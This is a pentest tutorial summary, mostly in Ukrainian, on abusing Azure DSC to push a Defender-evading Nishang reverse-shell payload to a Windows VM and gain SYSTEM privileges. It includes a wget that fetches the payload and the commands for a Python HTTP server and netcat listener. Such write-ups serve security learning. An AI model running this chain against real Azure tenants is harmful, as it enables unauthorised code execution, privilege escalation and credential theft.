Az - State Configuration RCE

Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Summary of Remote Server (C2) Infrastructure Preparation and Steps

Overview

Процес включає налаштування інфраструктури віддаленого сервера для розміщення модифікованого корисного навантаження Nishang Invoke-PowerShellTcp.ps1, названого RevPS.ps1, призначеного для обходу Windows Defender. Корисне навантаження подається з машини Kali Linux з IP 40.84.7.74 за допомогою простого Python HTTP сервера. Операція виконується через кілька етапів:

Step 1 — Create Files

• Files Required: Потрібні два скрипти PowerShell:

1. reverse_shell_config.ps1: Файл Desired State Configuration (DSC), який отримує та виконує корисне навантаження. Його можна отримати з GitHub.

2. push_reverse_shell_config.ps1: Скрипт для публікації конфігурації на VM, доступний на GitHub.

• Customization: Змінні та параметри в цих файлах повинні бути адаптовані до конкретного середовища користувача, включаючи імена ресурсів, шляхи до файлів та ідентифікатори сервера/корисного навантаження.

Step 2 — Zip Configuration File

• Файл reverse_shell_config.ps1 стискається в .zip файл, що робить його готовим для передачі до Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Крок 3 — Встановлення контексту зберігання та завантаження

• Стиснутий файл конфігурації завантажується в заздалегідь визначений контейнер зберігання Azure, azure-pentest, за допомогою cmdlet Set-AzStorageBlobContent Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Крок 4 — Підготовка Kali Box

• Сервер Kali завантажує корисне навантаження RevPS.ps1 з репозиторію GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

• Скрипт редагується для вказівки цільової Windows VM та порту для зворотного шелу.

Крок 5 — Опублікувати файл конфігурації

• Файл конфігурації виконується, в результаті чого скрипт зворотного шелу розгортається у вказаному місці на Windows VM.

Крок 6 — Хостинг корисного навантаження та налаштування прослуховувача

• Запускається Python SimpleHTTPServer для хостингу корисного навантаження, разом з прослуховувачем Netcat для захоплення вхідних з'єднань.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

• Заплановане завдання виконує payload, досягаючи привілеїв рівня SYSTEM.

Висновок

Успішне виконання цього процесу відкриває численні можливості для подальших дій, таких як витік облікових даних або розширення атаки на кілька ВМ. Посібник заохочує до безперервного навчання та креативності в сфері Azure Automation DSC.